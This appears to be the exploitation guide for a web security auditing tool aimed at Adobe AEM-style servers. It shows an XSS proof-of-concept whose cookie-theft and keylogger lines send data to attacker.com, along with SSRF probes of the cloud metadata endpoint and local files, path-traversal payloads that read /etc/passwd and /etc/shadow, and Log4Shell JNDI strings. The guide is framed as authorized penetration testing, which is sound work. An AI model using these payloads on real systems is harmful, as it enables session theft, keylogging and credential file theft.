Exploitation Guide

When the

1

--exploit

Enabling Exploitation

1
python auditor.py -t http://target.com:4502 --exploit

Exploitation Capabilities

XSS Exploitation

What it does:

• Generates HTML PoC files with JavaScript payloads
• Multiple payload variants (alert, cookie theft, keylogger)
• Saves PoC files for each vulnerable path

Output Location:

1
scan_results/<timestamp>/exploits/CVE-2018-12809/xss_poc_*.html

PoC File Contents:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<!DOCTYPE html>
<html>
<head>
    <title>XSS PoC - CVE-2018-12809</title>
</head>
<body>
    <h1>XSS Proof of Concept</h1>
    <p>Vulnerable Path: /bin/querybuilder.json</p>
    <p>Parameter: property</p>
    
    <script>
        // Alert payload
        alert('XSS Vulnerability Confirmed');
        
        // Cookie theft payload
        document.location='http://attacker.com/steal?cookie='+document.cookie;
        
        // Keylogger payload
        document.onkeypress = function(e) {
            new Image().src = 'http://attacker.com/keylog?key=' + e.key;
        };
    </script>
    
    <iframe src="http://target.com:4502/bin/querybuilder.json?property=<img src=x onerror=alert(1)>"></iframe>
</body>
</html>

Payload Variants:

• Simple alert:

  1

  alert(1)

• Cookie theft:

  1	document.cookie

• Keylogger:

  1	document.onkeypress

• DOM manipulation:

  1	document.body.innerHTML

SSRF Exploitation

What it does:

• Attempts to access internal resources (localhost, 127.0.0.1)
• Tests file system access (

  1	file:///etc/passwd

  )
• Tests AWS metadata endpoint access
• Reports successful internal resource access

Test Targets:

• 1	http://127.0.0.1:4502

• 1	http://localhost/system/console

• 1	file:///etc/passwd

• 1	http://169.254.169.254/latest/meta-data/

  (AWS)

Output Location:

1
scan_results/<timestamp>/exploits/CVE-2020-11987/ssrf_internal_access.txt

Output Format:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
SSRF Exploitation Results
==========================

Vulnerable Path: /bin/querybuilder.json
Parameter: url

Successful Internal Access:
- http://127.0.0.1:4502/system/console
  Status: 200 OK
  Response Length: 12345 bytes
  Content: [HTML content]

- file:///etc/passwd
  Status: 200 OK
  Response Length: 1024 bytes
  Content: [File contents]

Path Traversal Exploitation

What it does:

• Attempts to read sensitive files
• Multiple encoding variants (URL, double encoding, etc.)
• Saves extracted file contents
• Reports successful file access

Target Files:

• 1	/etc/passwd

• 1	/etc/shadow

• 1	/etc/hosts

• Application configuration files

Output Location:

1
scan_results/<timestamp>/exploits/CVE-2017-12617/extracted_etc_passwd.txt

Payload Variants:

• Standard:

  1	../../../etc/passwd

• URL encoded:

  1	..%2F..%2F..%2Fetc%2Fpasswd

• Double encoded:

  1	..%252F..%252F..%252Fetc%252Fpasswd

• Null byte:

  1	../../../etc/passwd%00

Extracted File Example:

1
2
3
4
5
6
7
8
9
10
11
Path Traversal Exploitation Results
===================================

Vulnerable Path: /system/console
Parameter: path

Successfully Extracted: /etc/passwd
Content:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

Information Disclosure Exploitation

What it does:

• Extracts Java version information
• Extracts OS information
• Extracts system properties
• Saves extracted data to files

Extracted Information:

• Java version and vendor
• Operating system details
• User home directory
• Java home directory
• System properties

Output Location:

1
scan_results/<timestamp>/exploits/CVE-2019-8086/disclosure_system_info.txt

Output Format:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Information Disclosure Results
==============================

Vulnerable Path: /system/console/status-slingsettings.json

Extracted Information:
- Java Version: 1.8.0_291
- Java Vendor: Oracle Corporation
- OS Name: Linux
- OS Version: 5.4.0-74-generic
- User Home: /home/user
- Java Home: /usr/lib/jvm/java-8-openjdk-amd64

System Properties:
- java.version=1.8.0_291
- os.name=Linux
- user.name=root
...

Log4Shell Exploitation

What it does:

• Tests OOB (Out-of-Band) payloads
• Multiple payload variants
• Response time analysis
• Pattern detection

Payload Variants:

• DNS:

  1	${jndi:dns://oob-domain.com}

• LDAP:

  1	${jndi:ldap://oob-domain.com/a}

• RMI:

  1	${jndi:rmi://oob-domain.com/a}

• Obfuscated variants

Output Location:

1
scan_results/<timestamp>/exploits/CVE-2021-44228/log4shell_payloads.txt

Exploit Output Structure

1
2
3
4
5
6
7
8
9
10
11
12
scan_results/
└── YYYYMMDD_HHMMSS/
    └── exploits/
        ├── CVE-2021-44228/
        │   └── log4shell_payloads.txt
        ├── CVE-2018-12809/
        │   ├── xss_poc_path1.html
        │   └── xss_poc_path2.html
        ├── CVE-2020-11987/
        │   └── ssrf_internal_access.txt
        └── CVE-2017-12617/
            └── extracted_etc_passwd.txt

Using Exploit Outputs

XSS PoC Files

1. Open the generated HTML file in a browser
2. The PoC will demonstrate the XSS vulnerability
3. Use for client-side testing and validation

SSRF Results

1. Review the internal access results
2. Identify accessible internal resources
3. Use for further exploitation or reporting

Path Traversal Results

1. Review extracted file contents
2. Identify sensitive information exposed
3. Use for impact assessment

Information Disclosure Results

1. Review extracted system information
2. Identify exposed sensitive data
3. Use for risk assessment

Best Practices

1. Validate Before Exploiting

1
2
3
4
5
# First, detect vulnerabilities
python auditor.py -t http://target.com:4502

# Then, exploit if vulnerabilities found
python auditor.py -t http://target.com:4502 --exploit

2. Review Exploit Outputs

Always review generated PoC files and extracted data:

• Verify they work as expected
• Check for false positives
• Validate impact

3. Use Responsibly

• Only exploit systems you own or have permission to test
• Don’t use exploit outputs maliciously
• Report findings responsibly

4. Document Findings

Use exploit outputs in your reports:

• Include PoC files as evidence
• Document extracted data
• Provide remediation recommendations

Limitations

False Positives

Exploitation may produce false positives:

• Some payloads may not work in all contexts
• Response analysis may misinterpret results
• Manual verification is recommended

Scope Limitations

• Exploitation is limited to detected vulnerabilities
• Not all CVEs have exploitation capabilities
• Some vulnerabilities require manual exploitation

Safety

• Exploitation is designed to be safe
• No destructive payloads are used
• Read-only operations where possible

Troubleshooting

No Exploit Outputs Generated

• Verify vulnerabilities were detected
• Check that

  1

  --exploit

  flag was used
• Review scan results for detected CVEs

PoC Files Don’t Work

• Check target URL in PoC files
• Verify payloads are correct
• Test manually to validate

Missing Exploit Data

• Check output directory permissions
• Verify exploit mode was enabled
• Review error messages in verbose mode

Want to learn more? Check out the Usage Guide or Examples!